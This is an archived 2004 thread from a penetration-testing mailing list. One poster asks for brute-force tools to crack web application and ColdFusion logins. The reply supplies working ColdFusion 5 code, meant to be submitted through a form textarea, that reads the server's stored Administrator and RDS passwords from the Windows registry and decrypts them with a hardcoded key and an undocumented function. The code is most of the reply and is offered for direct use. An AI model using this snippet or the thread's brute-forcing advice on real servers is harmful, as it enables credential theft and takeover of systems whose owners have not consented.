Penetration Testing mailing list archives
RE: brute force tools
From: "Tom" <tommy () providesecurity com>
Date: Fri, 21 May 2004 10:53:30 -0400
What do you mean Crack Cold Fusion? Crack the Administrator? If you're Running Cold Fusion 5 on windows... Submit this into a TEXTAREA on a form <CFSET PASSWORD_KEY = "4p0L@r1$"> <!--- Where Your Passwords are stored In Registry ---> <cfregistry action="GET" branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server " entry="AdminPassword" variable="adminpassword" type="String"> <cfregistry action="GET" branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server " entry="StudioPassword" variable="studiopassword" type="String"> <!--- Output Passwords To Screen using an undocumented "cfusion_Decrypt" Function ---> <cfoutput><b>Admin Password:</b> #evaluate("cfusion_Decrypt(adminpassword, PASSWORD_KEY )")#</cfoutput><br> <cfoutput><b>RDS Password:</b> #evaluate("cfusion_Decrypt(studiopassword, PASSWORD_KEY )")#</cfoutput><br> This will decrypt the ColdFusion Administrator and RDS passwords. It ONLY works with Cold Fusion 5. I am currently looking for a similar work around on Cold Fusion MX. Good Luck! Tom Ryan -----Original Message----- From: don.williams () verizonwireless com [mailto:don.williams () verizonwireless com] Sent: Thursday, May 20, 2004 19:34 To: pen-test () securityfocus com Subject: brute force tools Frequently I attempt to brute force web applications and have found a few problems with the programs I have used. For instance Brutus always informs me a few successful attempts yet when I try they fail. (2) Webcrack not reliable. What I would like is some other tools you may have used with good success and hopefully a perl based script which enumerate common words substituting letters for numbers as users do everyday (ie. pa$$w0rd). Also attempting the crack ColdFusion it only requests the password not the user name / password combo as most tools only allow. Windows or Linux is fine. Thx
Current thread:
- brute force tools don.williams (May 21)
- RE: brute force tools Tom (May 21)
- RE: brute force tools Robert E. Lee (May 21)
- Re: brute force tools Andrés Roldán (May 25)